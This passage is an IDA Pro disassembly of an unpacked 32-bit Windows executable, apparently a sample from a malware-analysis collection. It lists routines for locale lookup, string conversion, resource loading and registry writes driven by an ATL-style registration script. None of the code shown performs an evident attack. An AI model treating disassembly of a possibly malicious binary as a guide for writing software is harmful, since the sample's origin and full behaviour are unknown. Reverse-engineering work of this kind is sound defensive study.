;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : A0A3CD3A6029132063DA812BEB103972
; File Name : u:\work\a0a3cd3a6029132063da812beb103972_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000DA4D ( 55885.)
; Section size in file : 0000DA4D ( 55885.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: .text:00401D44�p
push ebx
push esi
push edi
mov edi, ds:dword_40F14C
mov esi, ecx
xor ebx, ebx
lea ecx, [ecx+0]
loc_401010: ; CODE XREF: sub_401000+35�j
; sub_401000+3A�j
mov eax, [esi+34h]
push 0FFFFFFFFh
push eax
call edi ; WaitForSingleObject
jmp short loc_401020
; ---------------------------------------------------------------------------
align 10h
loc_401020: ; CODE XREF: sub_401000+18�j
; sub_401000+30�j
mov ecx, [esi+34h]
push 1388h
push ecx
mov [esi+38h], bl
call edi ; WaitForSingleObject
test eax, eax
jz short loc_401020
cmp [esi+38h], bl
jnz short loc_401010
cmp [esi+8], ebx
jnz short loc_401010
mov edx, [esi+34h]
push edx
call ds:dword_40F150 ; CloseHandle
mov eax, [esi+30h]
push ebx
push ebx
push 12h
push eax
call ds:dword_40F234 ; PostThreadMessageA
pop edi
pop esi
pop ebx
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401060 proc near ; CODE XREF: WinMain(x,x,x,x)+5E�p
; WinMain(x,x,x,x)+8E�p
push esi
mov esi, eax
test esi, esi
push edi
jz short loc_40109A
mov edi, ds:dword_40F230
mov edi, edi
loc_401070: ; CODE XREF: sub_401060+38�j
cmp byte ptr [esi], 0
jz short loc_40109A
test ebx, ebx
mov eax, ebx
jz short loc_401091
jmp short loc_401080
; ---------------------------------------------------------------------------
align 10h
loc_401080: ; CODE XREF: sub_401060+1B�j
; sub_401060+2F�j
mov cl, [eax]
test cl, cl
jz short loc_401091
cmp [esi], cl
jz short loc_40109F
push eax
call edi ; CharNextA
test eax, eax
jnz short loc_401080
loc_401091: ; CODE XREF: sub_401060+19�j
; sub_401060+24�j
push esi
call edi ; CharNextA
mov esi, eax
test esi, esi
jnz short loc_401070
loc_40109A: ; CODE XREF: sub_401060+6�j
; sub_401060+13�j
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40109F: ; CODE XREF: sub_401060+28�j
push esi
call edi ; CharNextA
pop edi
pop esi
retn
sub_401060 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010B0 proc near ; CODE XREF: sub_402410+3E�p
; sub_402730+C9�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40F3B0
push offset __except_handler3
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov bl, 1
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
add eax, 2003h
and eax, 0FFFFFFFCh
call __alloca_probe
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_1C], eax
jmp short loc_401117
; ---------------------------------------------------------------------------
mov eax, [ebp+var_14]
mov ecx, [eax]
mov eax, [ecx]
xor edx, edx
cmp eax, 0C00000FDh
setz dl
mov eax, edx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor bl, bl
call __resetstkoflw
loc_401117: ; CODE XREF: sub_4010B0+47�j
mov [ebp+var_4], 0FFFFFFFFh
mov al, bl
lea esp, [ebp-28h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4010B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401140 proc near ; DATA XREF: .text:loc_4011DB�o
var_8 = byte ptr -8
sub esp, 8
push esi
xor esi, esi
call ds:dword_40F030 ; GetThreadLocale
push 7
lea ecx, [esp+10h+var_8]
push ecx
push 1004h
push eax
call ds:dword_40F02C ; GetLocaleInfoA
test eax, eax
jz short loc_401185
mov al, [esp+0Ch+var_8]
test al, al
lea ecx, [esp+0Ch+var_8]
jz short loc_401185
nop
loc_401170: ; CODE XREF: sub_401140+3F�j
movsx eax, al
lea edx, [esi+esi*4]
inc ecx
lea esi, [eax+edx*2-30h]
mov al, [ecx]
test al, al
jnz short loc_401170
test esi, esi
jnz short loc_401190
loc_401185: ; CODE XREF: sub_401140+21�j
; sub_401140+2D�j
call ds:dword_40F028 ; GetACP
pop esi
add esp, 8
retn
; ---------------------------------------------------------------------------
loc_401190: ; CODE XREF: sub_401140+43�j
mov eax, esi
pop esi
add esp, 8
retn
sub_401140 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011A0 proc near ; CODE XREF: .text:004011EC�p
; sub_401E30+1E�p ...
mov eax, 3
retn
sub_4011A0 endp
; ---------------------------------------------------------------------------
align 10h
sub esp, 94h
lea eax, [esp]
push eax
mov dword ptr [esp+4], 94h
call ds:dword_40F034 ; GetVersionExA
cmp dword ptr [esp+10h], 2
jnz short loc_4011DB
cmp dword ptr [esp+4], 5
mov eax, offset sub_4011A0
jnb short loc_4011E0
loc_4011DB: ; CODE XREF: .text:004011CD�j
mov eax, offset sub_401140
loc_4011E0: ; CODE XREF: .text:004011D9�j
push eax
push offset off_412040
call ds:dword_40F0C0 ; InterlockedExchange
call off_412040
add esp, 94h
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401200 proc near ; CODE XREF: sub_402730+177�p
; sub_402730+237�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_401236
mov eax, [esp+4+arg_4]
test eax, eax
jz short loc_401236
mov ecx, [esp+4+arg_8]
mov edx, [esp+4+arg_C]
push ecx
push esi
push 0FFFFFFFFh
push eax
push 0
push edx
mov word ptr [esi], 0
call ds:dword_40F038 ; MultiByteToWideChar
neg eax
sbb eax, eax
and eax, esi
pop esi
retn 10h
; ---------------------------------------------------------------------------
loc_401236: ; CODE XREF: sub_401200+7�j
; sub_401200+F�j
xor eax, eax
pop esi
retn 10h
sub_401200 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401240 proc near ; CODE XREF: sub_402410+7D�p
; sub_402730+F6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_401278
mov eax, [esp+4+arg_4]
test eax, eax
jz short loc_401278
mov ecx, [esp+4+arg_8]
mov edx, [esp+4+arg_C]
push 0
push 0
push ecx
push esi
push 0FFFFFFFFh
push eax
push 0
push edx
mov byte ptr [esi], 0
call ds:dword_40F03C ; WideCharToMultiByte
neg eax
sbb eax, eax
and eax, esi
pop esi
retn 10h
; ---------------------------------------------------------------------------
loc_401278: ; CODE XREF: sub_401240+7�j
; sub_401240+F�j
xor eax, eax
pop esi
retn 10h
sub_401240 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401280 proc near ; CODE XREF: sub_4050C0+188�p
; sub_405440+16D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push edi
push esi
call ds:dword_40F040 ; lstrlenW
mov edi, [esp+8+arg_0]
lea ecx, [eax+eax+2]
mov edx, ecx
shr ecx, 2
mov eax, edi
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
pop esi
retn
sub_401280 endp
; ---------------------------------------------------------------------------
align 10h
loc_4012B0: ; CODE XREF: sub_401CE0+1C�p
; sub_401E30+8C�p ...
mov edx, [esp+4]
xor eax, eax
cmp edx, 8007000Eh
setz al
push 0
push 0
push 1
dec eax
and eax, 6
add eax, 0C0000017h
push eax
call ds:dword_40F044 ; RaiseException
; ---------------------------------------------------------------------------
db 0Bh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4012E0 proc near ; CODE XREF: sub_40A5B8+9�p
; sub_40A615+6�p
mov eax, ecx
xor ecx, ecx
mov edx, eax
mov [edx], ecx
mov [edx+4], ecx
mov [edx+8], ecx
mov [edx+0Ch], ecx
mov [edx+10h], ecx
mov [edx+14h], ecx
retn
sub_4012E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401300 proc near ; CODE XREF: sub_40A5B8+2B�p
; sub_40A645+8B�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_40F3C0
push offset __except_handler3
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
mov [ebp+var_4], esi
push ecx
call ds:dword_40F050 ; InitializeCriticalSection
jmp short loc_401360
; ---------------------------------------------------------------------------
mov eax, [ebp+var_14]
mov ecx, [eax]
mov edx, [ecx]
mov [ebp+var_1C], edx
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor eax, eax
cmp [ebp+var_1C], 0C0000017h
setnz al
dec eax
and eax, 6C009h
add eax, 80004005h
mov esi, eax
loc_401360: ; CODE XREF: sub_401300+32�j
mov [ebp+var_4], 0FFFFFFFFh
mov eax, esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401380 proc near ; CODE XREF: sub_401DD0+36�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push edi
push ebx
call ds:dword_40F060 ; LoadResource
test eax, eax
jnz short loc_401399
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401399: ; CODE XREF: sub_401380+14�j
push esi
push eax
call ds:dword_40F05C ; LockResource
mov esi, eax
test esi, esi
jnz short loc_4013AD
loc_4013A7: ; CODE XREF: sub_401380+42�j
; sub_401380+50�j
pop esi
pop edi
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4013AD: ; CODE XREF: sub_401380+25�j
push edi
push ebx
call ds:dword_40F058 ; SizeofResource
mov ecx, [esp+0Ch+arg_8]
add eax, esi
and ecx, 0Fh
jbe short loc_4013CE
loc_4013C0: ; CODE XREF: sub_401380+4C�j
cmp esi, eax
jnb short loc_4013A7
dec ecx
movzx edx, word ptr [esi]
lea esi, [esi+edx*2+2]
jnz short loc_4013C0
loc_4013CE: ; CODE XREF: sub_401380+3E�j
cmp esi, eax
jnb short loc_4013A7
mov ax, [esi]
neg ax
sbb eax, eax
and eax, esi
pop esi
pop edi
pop ebx
retn
sub_401380 endp
; =============== S U B R O U T I N E =======================================
sub_4013E0 proc near ; CODE XREF: sub_402730+5A�p
; sub_404CD0+FD�p ...
call ds:dword_40F068 ; RtlGetLastWin32Error
test eax, eax
jle short locret_4013F4
and eax, 0FFFFh
or eax, 80070000h
locret_4013F4: ; CODE XREF: sub_4013E0+8�j
retn
sub_4013E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401400 proc near ; CODE XREF: sub_403D70+33E�p
; sub_404100+4E3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jle short locret_401412
and eax, 0FFFFh
or eax, 80070000h
locret_401412: ; CODE XREF: sub_401400+6�j
retn
sub_401400 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401420 proc near ; CODE XREF: sub_401B00+3D�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+8]
test eax, eax
mov [esp+8+var_4], 0
jnz short loc_40143A
pop esi
pop ecx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40143A: ; CODE XREF: sub_401420+13�j
mov edx, [esi+0Ch]
push edi
lea ecx, [esp+0Ch+var_4]
push ecx
push offset dword_40F3CC
push edx
call eax
mov edi, eax
test edi, edi
jl short loc_40146F
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
lea eax, [esi+14h]
push eax
mov eax, [esp+10h+var_4]
push ecx
mov ecx, [esi]
push edx
push eax
push ecx
call ds:dword_40F27C
mov edi, eax
loc_40146F: ; CODE XREF: sub_401420+2F�j
mov eax, [esp+0Ch+var_4]
test eax, eax
jz short loc_40147D
mov edx, [eax]
push eax
call dword ptr [edx+8]
loc_40147D: ; CODE XREF: sub_401420+55�j
mov eax, edi
pop edi
pop esi
pop ecx
retn 0Ch
sub_401420 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401490 proc near ; CODE XREF: sub_4050C0+144�p
; sub_405440+126�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov ax, [edx]
test ax, ax
jz short loc_4014C4
mov ecx, [esp+arg_0]
loc_4014A0: ; CODE XREF: sub_401490+2E�j
mov [ecx], ax
add ecx, 2
cmp word ptr [edx], 27h
jnz short loc_4014B4
mov word ptr [ecx], 27h
add ecx, 2
loc_4014B4: ; CODE XREF: sub_401490+1A�j
mov ax, [edx+2]
add edx, 2
test ax, ax
jnz short loc_4014A0
mov [ecx], ax
retn
; ---------------------------------------------------------------------------
loc_4014C4: ; CODE XREF: sub_401490+A�j
mov eax, [esp+arg_0]
mov word ptr [eax], 0
retn
sub_401490 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4014D0 proc near ; CODE XREF: sub_402B60+21B�p
; sub_402B60+291�p
push esi
mov esi, ecx
mov ecx, [esi]
xor eax, eax
test ecx, ecx
jz short loc_4014E8
push ecx
call ds:dword_40F020 ; RegCloseKey
mov dword ptr [esi], 0
loc_4014E8: ; CODE XREF: sub_4014D0+9�j
pop esi
retn
sub_4014D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4014F0 proc near ; CODE XREF: sub_402B60+1F1�p
; sub_402B60+26B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
mov edx, [esp+4+arg_4]
push esi
lea eax, [esp+8+var_4]
push eax
mov eax, [esp+0Ch+arg_0]
mov esi, ecx
mov ecx, [esp+0Ch+arg_8]
push ecx
push 0
push edx
push eax
mov [esp+1Ch+var_4], 0
call ds:dword_40F00C ; RegOpenKeyExA
test eax, eax
jnz short loc_401535
mov ecx, [esi]
test ecx, ecx
jz short loc_40152F
push ecx
call ds:dword_40F020 ; RegCloseKey
mov dword ptr [esi], 0
loc_40152F: ; CODE XREF: sub_4014F0+30�j
mov ecx, [esp+8+var_4]
mov [esi], ecx
loc_401535: ; CODE XREF: sub_4014F0+2A�j
pop esi
pop ecx
retn 0Ch
sub_4014F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401540 proc near ; CODE XREF: sub_403D70+267�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov edx, [esp+arg_0]
push 4
lea eax, [esp+4+arg_4]
push eax
mov eax, [ecx]
push 4
push 0
push edx
push eax
call ds:dword_40F010 ; RegSetValueExA
retn 8
sub_401540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401560 proc near ; CODE XREF: sub_403D70+1C2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_4]
push edi
mov esi, ecx
call ds:dword_40F084 ; lstrlen
mov ecx, [esp+8+arg_0]
mov edx, [esi]
inc eax
push eax
mov eax, [esp+0Ch+arg_8]
push edi
push eax
push 0
push ecx
push edx
call ds:dword_40F010 ; RegSetValueExA
pop edi
pop esi
retn 0Ch
sub_401560 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401590 proc near ; CODE XREF: sub_403D70+310�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, ds:dword_40F084
push ebp
push esi
mov esi, [esp+0Ch+arg_4]
push edi
mov ebp, ecx
xor edi, edi
loc_4015A2: ; CODE XREF: sub_401590+1D�j
push esi
call ebx ; lstrlen
inc eax
add esi, eax
add edi, eax
cmp eax, 1
jnz short loc_4015A2
mov eax, [esp+10h+arg_4]
mov ecx, [esp+10h+arg_0]
mov edx, [ebp+0]
push edi
push eax
push 7
push 0
push ecx
push edx
call ds:dword_40F010 ; RegSetValueExA
pop edi
pop esi
pop ebp
pop ebx
retn 8
sub_401590 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4015D0 proc near ; CODE XREF: sub_402410+90�p
; sub_4025B0+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, ecx
mov eax, [ebx]
push ebp
mov ebp, [esp+8+arg_4]
lea ecx, [eax+ebp+1]
cmp ecx, [ebx+4]
jl short loc_40160E
loc_4015E3: ; CODE XREF: sub_4015D0+25�j
mov eax, [ebx+4]
shl eax, 1
mov [ebx+4], eax
mov edx, [ebx]
lea ecx, [edx+ebp+1]
mov edx, eax
cmp ecx, edx
jge short loc_4015E3
mov edx, [ebx+8]
push eax
push edx
call ds:dword_40F268
test eax, eax
jnz short loc_40160B
pop ebp
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_40160B: ; CODE XREF: sub_4015D0+34�j
mov [ebx+8], eax
loc_40160E: ; CODE XREF: sub_4015D0+11�j
mov eax, [ebx+8]
push esi
mov esi, [esp+0Ch+arg_0]
push edi
mov edi, [ebx]
add edi, eax
mov ecx, ebp
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebx]
mov ecx, [ebx+8]
pop edi
add eax, ebp
pop esi
mov [ebx], eax
pop ebp
mov byte ptr [eax+ecx], 0
mov eax, 1
pop ebx
retn 8
sub_4015D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401650 proc near ; CODE XREF: sub_403D70+3B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
test byte ptr dword_412528, 1
jnz short loc_4016AC
or dword_412528, 1
mov dword_412508, offset aS_0 ; "S"
mov word_41250C, 8
mov dword_412510, offset aM ; "M"
mov word_412514, 4008h
mov dword_412518, offset aD ; "D"
mov word_41251C, 13h
mov dword_412520, offset aB ; "B"
mov word_412524, 11h
loc_4016AC: ; CODE XREF: sub_401650+7�j
push ebx
mov ebx, ds:dword_40F088
push esi
push edi
mov edi, [esp+0Ch+arg_0]
xor esi, esi
jmp short loc_4016C0
; ---------------------------------------------------------------------------
align 10h
loc_4016C0: ; CODE XREF: sub_401650+6B�j
; sub_401650+83�j
mov eax, dword_412508[esi*8]
push eax
push edi
call ebx ; lstrcmpi
test eax, eax
jz short loc_4016DB
inc esi
cmp esi, 4
jb short loc_4016C0
pop edi
pop esi
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4016DB: ; CODE XREF: sub_401650+7D�j
mov cx, word_41250C[esi*8]
mov edx, [esp+0Ch+arg_4]
pop edi
pop esi
mov [edx], cx
mov eax, 1
pop ebx
retn
sub_401650 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401700 proc near ; CODE XREF: sub_403D70+147�p
arg_0 = byte ptr 4
movsx ecx, [esp+arg_0]
lea eax, [ecx-30h]
cmp eax, 36h ; switch 55 cases
ja short loc_401723 ; default
; jumptable 00401714 cases 10-16,23-48
movzx edx, ds:byte_401738[eax]
jmp ds:off_401728[edx*4] ; switch jump
loc_40171B: ; DATA XREF: .text:off_401728�o
lea eax, [ecx-37h] ; jumptable 00401714 cases 17-22
retn
; ---------------------------------------------------------------------------
loc_40171F: ; CODE XREF: sub_401700+14�j
; DATA XREF: .text:off_401728�o
lea eax, [ecx-57h] ; jumptable 00401714 cases 49-54
retn
; ---------------------------------------------------------------------------
loc_401723: ; CODE XREF: sub_401700+B�j
; sub_401700+14�j
; DATA XREF: ...
xor al, al ; default
; jumptable 00401714 cases 10-16,23-48
locret_401725: ; CODE XREF: sub_401700+14�j
; DATA XREF: .text:off_401728�o
retn ; jumptable 00401714 cases 0-9
sub_401700 endp
; ---------------------------------------------------------------------------
align 4
off_401728 dd offset locret_401725, offset loc_40171B, offset loc_40171F
; DATA XREF: sub_401700+14�r
dd offset loc_401723 ; jump table for switch statement
byte_401738 db 0, 0, 0, 0 ; DATA XREF: sub_401700+D�r
db 0, 0, 0, 0 ; indirect table for switch statement
db 0, 0, 3, 3
db 3, 3, 3, 3
db 3, 1, 1, 1
db 1, 1, 1, 3
db 3, 3, 3, 3
db 3, 3, 3, 3
db 3, 3, 3, 3
db 3, 3, 3, 3
db 3, 3, 3, 3
db 3, 3, 3, 3
db 3, 2, 2, 2
db 2, 2, 2
align 10h
; =============== S U B R O U T I N E =======================================
sub_401770 proc near ; CODE XREF: sub_4025B0+EB�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, [esp+arg_0]
push edi
xor edi, edi
test eax, eax
jnz short loc_40177D
pop edi
retn
; ---------------------------------------------------------------------------
loc_40177D: ; CODE XREF: sub_401770+9�j
mov cl, [eax]
test cl, cl
jz short loc_4017A7
push ebx
mov bl, [esp+8+arg_4]
push esi
mov esi, ds:dword_40F230
nop
loc_401790: ; CODE XREF: sub_401770+2B�j
cmp cl, bl
jz short loc_4017A3
push eax
call esi ; CharNextA
mov cl, [eax]
test cl, cl
jnz short loc_401790
pop esi
pop ebx
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4017A3: ; CODE XREF: sub_401770+22�j
pop esi
mov edi, eax
pop ebx
loc_4017A7: ; CODE XREF: sub_401770+11�j
mov eax, edi
pop edi
retn
sub_401770 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4017B0 proc near ; CODE XREF: sub_401810+3�p
; sub_4019E0+26�p ...
push esi
push edi
mov edi, ds:dword_40F230
mov esi, ecx
lea ebx, [ebx+0]
loc_4017C0: ; CODE XREF: sub_4017B0+30�j
mov eax, [esi]
movsx ecx, byte ptr [eax]
add ecx, 0FFFFFFF7h
cmp ecx, 17h ; switch 24 cases
ja short loc_4017E2 ; default
; jumptable 004017D4 cases 2,3,5-22
movzx ecx, ds:byte_4017F0[ecx]
jmp ds:off_4017E8[ecx*4] ; switch jump
loc_4017DB: ; DATA XREF: .text:off_4017E8�o
push eax ; jumptable 004017D4 cases 0,1,4,23
call edi ; CharNextA
mov [esi], eax
jmp short loc_4017C0
; ---------------------------------------------------------------------------
loc_4017E2: ; CODE XREF: sub_4017B0+1B�j
; sub_4017B0+24�j
; DATA XREF: ...
pop edi ; default
; jumptable 004017D4 cases 2,3,5-22
pop esi
retn
sub_4017B0 endp
; ---------------------------------------------------------------------------
align 4
off_4017E8 dd offset loc_4017DB ; DATA XREF: sub_4017B0+24�r
dd offset loc_4017E2 ; jump table for switch statement
byte_4017F0 db 0, 0, 1, 1 ; DATA XREF: sub_4017B0+1D�r
db 0, 1, 1, 1 ; indirect table for switch statement
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 0
align 10h
; =============== S U B R O U T I N E =======================================
sub_401810 proc near ; CODE XREF: sub_4019E0+1B�p
; sub_4019E0+32�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
call sub_4017B0
mov ecx, [esi]
mov al, [ecx]
test al, al
jnz short loc_401829
mov eax, 80020009h
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_401829: ; CODE XREF: sub_401810+E�j
cmp al, 27h
push ebx
push ebp
mov ebp, ds:dword_40F230
push edi
mov edi, [esp+10h+arg_0]
mov [esp+10h+arg_0], edi
jnz loc_4018D0
push ecx
call ebp ; CharNextA
mov [esi], eax
cmp byte ptr [eax], 0
jz short loc_4018A3
lea esp, [esp+0]
loc_401850: ; CODE XREF: sub_401810+91�j
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_40185F
push eax
call ebp ; CharNextA
cmp byte ptr [eax], 27h
jnz short loc_4018A3
loc_40185F: ; CODE XREF: sub_401810+45�j
mov eax, [esi]
cmp byte ptr [eax], 27h
jnz short loc_40186B
push eax
call ebp ; CharNextA
mov [esi], eax
loc_40186B: ; CODE XREF: sub_401810+54�j
mov ebx, [esi]
push ebx
call ebp ; CharNextA
mov ecx, [esp+10h+arg_0]
add ecx, 1000h
lea edx, [edi+2]
cmp edx, ecx
mov [esi], eax
jnb short loc_4018BD
cmp ebx, eax
jnb short loc_40189C
mov eax, ebx
lea esp, [esp+0]
loc_401890: ; CODE XREF: sub_401810+8A�j
mov cl, [eax]
mov [edi], cl
mov ecx, [esi]
inc eax
inc edi
cmp eax, ecx
jb short loc_401890
loc_40189C: ; CODE XREF: sub_401810+75�j
mov edx, [esi]
cmp byte ptr [edx], 0
jnz short loc_401850
loc_4018A3: ; CODE XREF: sub_401810+3A�j
; sub_401810+4D�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz short loc_4018BD
mov byte ptr [edi], 0
mov ecx, [esi]
push ecx
call ebp ; CharNextA
pop edi
pop ebp
mov [esi], eax
pop ebx
xor eax, eax
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4018BD: ; CODE XREF: sub_401810+71�j
; sub_401810+98�j ...
pop edi
pop ebp
pop ebx
mov eax, 80020009h
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
loc_4018D0: ; CODE XREF: sub_401810+2C�j
; sub_401810+108�j
mov ebx, [esi]
movsx eax, byte ptr [ebx]
add eax, 0FFFFFFF7h
cmp eax, 17h ; switch 24 cases
ja short loc_4018EB ; default
; jumptable 004018E4 cases 2,3,5-22
movzx edx, ds:byte_401930[eax]
jmp ds:off_401928[edx*4] ; switch jump
loc_4018EB: ; CODE XREF: sub_401810+CB�j
; DATA XREF: .text:off_401928�o
push ebx ; default
; jumptable 004018E4 cases 2,3,5-22
call ebp ; CharNextA
mov ecx, [esp+10h+arg_0]
add ecx, 1000h
lea edx, [edi+2]
cmp edx, ecx
mov [esi], eax
jnb short loc_4018BD
cmp ebx, eax
jnb short loc_401913
mov eax, ebx
loc_401907: ; CODE XREF: sub_401810+101�j
mov cl, [eax]
mov [edi], cl
mov ecx, [esi]
inc eax
inc edi
cmp eax, ecx
jb short loc_401907
loc_401913: ; CODE XREF: sub_401810+F3�j
mov edx, [esi]
cmp byte ptr [edx], 0
jnz short loc_4018D0
loc_40191A: ; CODE XREF: sub_401810+D4�j
; DATA XREF: .text:off_401928�o
mov byte ptr [edi], 0 ; jumptable 004018E4 cases 0,1,4,23
pop edi
pop ebp
pop ebx
xor eax, eax
pop esi
retn 4
sub_401810 endp
; ---------------------------------------------------------------------------
align 4
off_401928 dd offset loc_40191A ; DATA XREF: sub_401810+D4�r
dd offset loc_4018EB ; jump table for switch statement
byte_401930 db 0, 0, 1, 1 ; DATA XREF: sub_401810+CD�r
db 0, 1, 1, 1 ; indirect table for switch statement
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 0
align 10h
; =============== S U B R O U T I N E =======================================
sub_401950 proc near ; CODE XREF: sub_404100+CF�p
; sub_404100+517�p
arg_0 = dword ptr 4
push ebx
mov ebx, ds:dword_40F088
push esi
push edi
mov edi, [esp+0Ch+arg_0]
mov esi, offset off_40F288
loc_401962: ; CODE XREF: sub_401950+25�j
mov eax, [esi]
push eax
push edi
call ebx ; lstrcmpi
test eax, eax
jz short loc_401982
add esi, 4
cmp esi, offset aTypelib ; "TypeLib"
jl short loc_401962
pop edi
pop esi
mov eax, 1
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_401982: ; CODE XREF: sub_401950+1A�j
pop edi
pop esi
xor eax, eax
pop ebx
retn 4
sub_401950 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
